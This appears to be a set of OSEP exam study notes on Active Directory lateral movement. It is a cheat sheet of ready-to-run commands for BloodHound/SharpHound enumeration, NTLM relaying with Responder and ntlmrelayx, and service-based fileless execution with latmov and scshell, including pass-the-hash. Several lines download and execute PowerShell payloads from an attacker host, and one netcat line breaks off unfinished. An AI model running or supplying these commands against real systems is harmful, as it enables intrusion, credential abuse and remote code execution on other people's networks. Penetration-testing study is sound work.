OSEP Notes
Lateral Movement

BloodHound

.\SharpHound.exe -c all -d active.htb -SearchForest
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
.\SharpHound.exe -c all,GPOLocalGroup
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
.\SharpHound.exe -c all,GPOLocalGroup --searchforest

Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
Invoke-BloodHound -CollectionMethod All -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>

pip install bloodhound
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all

Relay

cme smb --gen-relay-list smb_targets.txt 172.21.23.0/24
Responder -I tun0 -dw
ntlmrelayx.py -no-http-server -smb2support -t $IP -c 'cmd /c whoami'
or
ntlmrelayx.py -no-http-server -smb2support -t $IP -c "cmd /c powershell.exe iex(new-object net.webclient).downloadstring('http://172.21.23.27/rev.ps1')"
or
ntlmrelayx.py -no-http-server -smb2support -t $IP -e payload.exe

Fileless Movement

$sess = New-PSSession -ComputerName <Name>
Copy-Item -Path C:\users\public\payload.ps1 -Destination 'C:\users\public\payload.ps1' -ToSession $sess

latmov.exe <server> SensorService "cmd.exe /c nc.exe 
latmov.exe <server> SensorService "cmd.exe /c powershell.exe iex(new-object net.webclient).downloadstring('http://172.21.23.27/payload.ps1')"
or
proxychains python scshell.py -service-name Sensorservice DOMAIN/USERNAME:PASSWORD@ComputerIP
proxychains python scshell.py -service-name Sensorservice DOMAIN/USERNAME@ComputerIP -hashes 00000000000000000000000000000000:aec2214937bedcfa722c4123ca859423
